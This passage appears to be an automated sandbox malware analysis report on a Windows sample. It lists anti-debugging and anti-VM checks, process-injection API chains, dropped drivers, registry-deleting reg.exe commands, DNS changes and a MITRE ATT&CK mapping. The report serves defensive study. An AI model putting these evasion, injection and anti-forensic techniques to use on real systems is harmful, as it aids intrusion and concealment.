          Source: C:\Program Files (x86)\Java\DC1FFAF.exeRDTSC instruction interceptor: First address: 432A13 second address: 432A13 instructions: 0x00000000 rdtsc 0x00000002 pop ebp 0x00000003 ret 0x00000004 xor edx, edx 0x00000006 mov ecx, 0000003Dh 0x0000000b div ecx 0x0000000d mov eax, dword ptr [ebp-000000B4h] 0x00000013 mov cl, byte ptr [ebp+edx-000000B0h] 0x0000001a mov byte ptr [ebp+eax-70h], cl 0x0000001e jmp 00007F9FA0B3ADA7h 0x00000020 mov edx, dword ptr [ebp-000000B4h] 0x00000026 add edx, 01h 0x00000029 mov dword ptr [ebp-000000B4h], edx 0x0000002f mov eax, dword ptr [ebp-000000B4h] 0x00000035 cmp eax, dword ptr [ebp-04h] 0x00000038 jnl 00007F9FA0B3AE03h 0x0000003a call 00007F9FA0B07E6Fh 0x0000003f push ebp 0x00000040 mov ebp, esp 0x00000042 rdtsc
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeRDTSC instruction interceptor: First address: 69EA3F43 second address: 69EA3F43 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 mov eax, 4325C53Fh 0x00000009 mul ecx 0x0000000b shr edx, 04h 0x0000000e imul edx, edx, 3Dh 0x00000011 sub ecx, edx 0x00000013 mov cl, byte ptr [esp+ecx+6Ch] 0x00000017 mov byte ptr [esp+esi+08h], cl 0x0000001b inc esi 0x0000001c cmp esi, 05h 0x0000001f jl 00007F9FA0B392A1h 0x00000021 rdtsc
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeMemory allocated: 7100000 memory reserve | memory write watchJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeMemory allocated: D9E0000 memory commit | memory reserve | memory write watchJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeMemory allocated: DF50000 memory reserve | memory write watchJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeMemory allocated: E200000 memory reserve | memory write watchJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E85B00 rdtsc 2_2_69E85B00
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_004684E0 sldt bx2_2_004684E0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeWindow / User API: threadDelayed 9382Jump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeDropped PE file which has not been started: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\CA229129\42EEXUWWZ.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeDropped PE file which has not been started: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\CA229129\1F0xyrmp.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeDropped PE file which has not been started: C:\Windows\SysWOW64\BC66DPQaf.sysJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeDropped PE file which has not been started: C:\Users\user\Desktop\EEC3DA20E\E2416B28\38902yywx.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeDropped PE file which has not been started: C:\Users\user\Desktop\EEC3DA20E\CFDEE45078\C2B2CFEA7.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeDropped PE file which has not been started: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\DB37C1B99\BD950wrst.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeDropped PE file which has not been started: C:\Users\user\Desktop\EEC3DA20E\B5155CBEC4E\51D610yws.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeDropped PE file which has not been started: C:\Windows\SysWOW64\A16652yzz.sysJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeDropped PE file which has not been started: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\F03D5C\9605A212x.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeDropped PE file which has not been started: C:\Windows\DC1FFAF.sysJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeDropped PE file which has not been started: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\C5639556181\7488JGDAA.exeJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeDropped PE file which has not been started: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\A9F7A9DD\A815rppmj.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeDropped PE file which has not been started: C:\Users\user\Desktop\EEC3DA20E\C1CE322\DE840zzuv.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeDropped PE file which has not been started: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\B671819D97E4\84AEHJG8C.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeDropped PE file which has not been started: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\E71620\712EVTPSM.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeDropped PE file which has not been started: C:\Users\user\Desktop\EEC3DA20E\EC4D54E4D0\338Atwspn.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeDropped PE file which has not been started: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\DC9B0A72\DE3EC8324.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeDropped PE file which has not been started: C:\Users\user\Desktop\EEC3DA20E\FFA96FF9\FB97GB461.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeDropped PE file which has not been started: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\A90B6898\5B7DOONHA.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeDropped PE file which has not been started: C:\Windows\SysWOW64\2865ivSJ0.sysJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeDropped PE file which has not been started: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\A90B6898\586030GBC.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeDropped PE file which has not been started: C:\Users\user\Desktop\EEC3DA20E\CDC745\17B0883wr.dllJump to dropped file
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-55907
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E9B8D02_2_69E9B8D0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exe TID: 6716Thread sleep time: -250000s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exe TID: 6716Thread sleep time: -9382000s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 5724Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 1540Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EBC474 __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,2_2_69EBC474
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_00468010 _strlen,_strlen,FindFirstFileA,_strlen,_strlen,_strncpy,2_2_00468010
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_004684E0 _strlen,_strlen,FindFirstFileA,_strlen,_strlen,FindClose,2_2_004684E0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_00443E10 _strlen,_strlen,FindFirstFileA,_strlen,_strlen,_strncpy,FindNextFileA,2_2_00443E10
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_0040ED70 GetSystemInfo,VirtualAlloc,2_2_0040ED70
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.iniJump to behavior
          Source: DC1FFAF.exe, 00000002.00000002.4778216886.00000000141A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: llvmtoolsd.exe
          Source: C2B2CFEA7.dll.2.drBinary or memory string: VMware
          Source: svchost.exe, 00000004.00000002.3819016803.000001BC6482B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW |
          Source: C2B2CFEA7.dll.2.drBinary or memory string: vmtoolsd.exe
          Source: C2B2CFEA7.dll.2.drBinary or memory string: //./vmmemctl
          Source: 1.exe, 00000000.00000002.2176113833.0000000004592000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
          Source: DC1FFAF.exe, 00000002.00000002.4778216886.00000000141A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Control\VideoVMware
          Source: C2B2CFEA7.dll.2.drBinary or memory string: "SYSTEM\ControlSet001\Control\VideoVMware Physical Disk Helper ServiceVMToolsvmvss
          Source: C2B2CFEA7.dll.2.drBinary or memory string: c:\dg.dllvmtoolsd.exe
          Source: C2B2CFEA7.dll.2.drBinary or memory string: SYSTEM\ControlSet001\Control\VideoVMware Physical Disk Helper Service
          Source: DC1FFAF.exe, 00000002.00000002.4675493919.0000000003E42000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4686679559.000000000776F000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000003.2241627746.000000000776B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3819834785.000001BC6A055000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: DC1FFAF.exe, 00000002.00000002.4778216886.00000000141A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Physical Disk Helper ServiceVMToolsvmvss
          Source: C2B2CFEA7.dll.2.drBinary or memory string: VMTools
          Source: DC1FFAF.exe, 00000002.00000002.4778216886.00000000141A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "SYSTEM\ControlSet001\Control\VideoVMware
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeAPI call chain: ExitProcess graph end nodegraph_2-55871
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeAPI call chain: ExitProcess graph end nodegraph_2-55980
          Source: C:\Users\user\Desktop\1.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E85B00 rdtsc 2_2_69E85B00
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EBE9D7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_69EBE9D7
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E8F3F0 _memset,WSACreateEvent,GetCurrentProcessId,WSASocketA,WSAGetLastError,_sprintf,OutputDebugStringA,WSAEventSelect,_malloc,2_2_69E8F3F0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EA0D20 ReadProcessMemory,LoadLibraryA,GetProcAddress,ReadProcessMemory,FreeLibrary,2_2_69EA0D20
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69ED3D7B CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,2_2_69ED3D7B
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EBE9D7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_69EBE9D7
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EC23CC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_69EC23CC
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69ECF0AB __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_69ECF0AB

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\1.exeMemory allocated: C:\Program Files (x86)\Java\DC1FFAF.exe base: 400000 protect: page execute and read and writeJump to behavior
          Contains functionality to inject threads in other processes
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E9B0E0 RDTP,GetFileAttributesA,MessageBoxA,__wfopen_s,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,__wfopen_s,OutputDebugStringA,OutputDebugStringA,CreateFileA,OutputDebugStringA,OutputDebugStringA,GetFileSize,_malloc,ReadFile,CloseHandle,_malloc,_memset,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,OpenProcess,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,CloseHandle,__wfopen_s,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,2_2_69E9B0E0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E9D790 OutputDebugStringA,OutputDebugStringA,VirtualAllocEx,WriteProcessMemory,VirtualFreeEx,CloseHandle,GetModuleHandleA,GetProcAddress,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,2_2_69E9D790
          Found driver which could be used to inject code into processes
          Source: 2865ivSJ0.sys.2.drStatic PE information: Found potential injection code
          Source: DC1FFAF.sys.2.drStatic PE information: Found potential injection code
          Source: BC66DPQaf.sys.2.drStatic PE information: Found potential injection code
          Source: A16652yzz.sys.2.drStatic PE information: Found potential injection code
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\1.exeMemory written: C:\Program Files (x86)\Java\DC1FFAF.exe base: 400000 value starts with: 4D5AJump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\1.exeMemory written: C:\Program Files (x86)\Java\DC1FFAF.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\1.exeMemory written: C:\Program Files (x86)\Java\DC1FFAF.exe base: 1F27000Jump to behavior
          Source: C:\Users\user\Desktop\1.exeMemory written: C:\Program Files (x86)\Java\DC1FFAF.exe base: 3C0E000Jump to behavior
          Source: C:\Users\user\Desktop\1.exeMemory written: C:\Program Files (x86)\Java\DC1FFAF.exe base: 3C0F000Jump to behavior
          Source: C:\Users\user\Desktop\1.exeProcess created: C:\Program Files (x86)\Java\DC1FFAF.exe "C:\Program Files (x86)\java\DC1FFAF.exe" WfCSiyl7KCmSe3x1d3x7eyiSWnspgSp9HpLfPHsme04=Jump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\System32\reg.exe" delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\2865ivSJ0 /fJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\System32\reg.exe" delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\BC66DPQaf /fJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,2_2_69EB05F9
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: GetLocaleInfoA,2_2_69ED3226
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: GetLocaleInfoA,GetLocaleInfoA,2_2_004AC3CA
          Source: C:\Users\user\Desktop\1.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeQueries volume information: unknown VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeQueries volume information: unknown VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: unknown VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: unknown VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: unknown VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E84640 GetLocalTime,GetCurrentProcessId,_sprintf,OpenFileMappingA,CreateFileMappingA,MapViewOfFile,2_2_69E84640
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69ECBC3B __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,2_2_69ECBC3B

          Stealing of Sensitive Information

          barindex
          Modifies the DNS server
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeRegistry value created: 8.8.8.8,114.114.114.114Jump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeRegistry value created: 8.8.8.8,114.114.114.114Jump to behavior

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Native API          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		1
          Credential API Hooking          		2
          System Time Discovery          		Remote Services1
          Archive Collected Data          		3
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Command and Scripting Interpreter          		32
          Windows Service          		1
          Access Token Manipulation          		3
          Obfuscated Files or Information          		1
          Input Capture          		4
          File and Directory Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		2
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          Service Execution          		Logon Script (Windows)32
          Windows Service          		2
          Software Packing          		Security Account Manager133
          System Information Discovery          		SMB/Windows Admin Shares1
          Input Capture          		4
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook511
          Process Injection          		1
          DLL Side-Loading          		NTDS461
          Security Software Discovery          		Distributed Component Object ModelInput Capture14
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          File Deletion          		LSA Secrets4
          Virtualization/Sandbox Evasion          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
          Masquerading          		Cached Domain Credentials2
          Process Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
          Modify Registry          		DCSync11
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job4
          Virtualization/Sandbox Evasion          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Access Token Manipulation          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron511
          Process Injection          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1488636 Sample: 1.exe Startdate: 06/08/2024 Architecture: WINDOWS Score: 100 45 vip.baxingfz.com 2->45 57 Malicious sample detected (through community Yara rule) 2->57 59 Antivirus detection for dropped file 2->59 61 Antivirus / Scanner detection for submitted sample 2->61 63 14 other signatures 2->63 9 1.exe 2 2->9         started        13 svchost.exe 1 1 2->13         started        signatures3 process4 dnsIp5 37 C:\Program Files (x86)\Java\DC1FFAF.exe, PE32 9->37 dropped 65 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 9->65 67 Writes to foreign memory regions 9->67 69 Allocates memory in foreign processes 9->69 71 2 other signatures 9->71 16 DC1FFAF.exe 18 71 9->16         started        47 127.0.0.1 unknown unknown 13->47 file6 signatures7 process8 dnsIp9 39 www.sogou.com 119.28.109.132, 49719, 49755, 80 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN China 16->39 41 sh2.general.proxy.sogou.com 49.51.65.181, 49723, 49763, 80 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN China 16->41 43 74 other IPs or domains 16->43 29 C:\Windows\SysWOW64\BC66DPQaf.sys, PE32+ 16->29 dropped 31 C:\Windows\SysWOW64\A16652yzz.sys, PE32+ 16->31 dropped 33 C:\Windows\SysWOW64\2865ivSJ0.sys, PE32+ 16->33 dropped 35 19 other malicious files 16->35 dropped 49 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 16->49 51 Uses cmd line tools excessively to alter registry or file data 16->51 53 Modifies the DNS server 16->53 55 Sample is not signed and drops a device driver 16->55 21 reg.exe 1 16->21         started        23 reg.exe 1 16->23         started        file10 signatures11 process12 process13 25 conhost.exe 21->25         started        27 conhost.exe 23->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          1.exe29%ReversingLabs
          1.exe100%AviraHEUR/AGEN.1315452
          1.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\Desktop\EEC3DA20E\CFDEE45078\C2B2CFEA7.dll100%AviraHEUR/AGEN.1328196
          C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\DB37C1B99\BD950wrst.dll100%AviraTR/Inject.zdewt
          C:\Windows\SysWOW64\A16652yzz.sys100%AviraHEUR/AGEN.1360134
          C:\Windows\DC1FFAF.sys100%AviraHEUR/AGEN.1360134
          C:\Users\user\Desktop\EEC3DA20E\C1CE322\DE840zzuv.dll100%AviraHEUR/AGEN.1328190
          C:\Windows\SysWOW64\2865ivSJ0.sys100%AviraHEUR/AGEN.1360134
          C:\Users\user\Desktop\EEC3DA20E\FFA96FF9\FB97GB461.dll100%AviraHEUR/AGEN.1328190
          C:\Windows\SysWOW64\BC66DPQaf.sys100%AviraHEUR/AGEN.1360134
          C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\C5639556181\7488JGDAA.exe100%Joe Sandbox ML
          C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\A90B6898\586030GBC.dll100%Joe Sandbox ML
          C:\Users\user\Desktop\EEC3DA20E\CFDEE45078\C2B2CFEA7.dll100%Joe Sandbox ML
          C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\DB37C1B99\BD950wrst.dll100%Joe Sandbox ML
          C:\Windows\SysWOW64\A16652yzz.sys100%Joe Sandbox ML
          C:\Program Files (x86)\Java\DC1FFAF.exe100%Joe Sandbox ML
          C:\Windows\DC1FFAF.sys100%Joe Sandbox ML
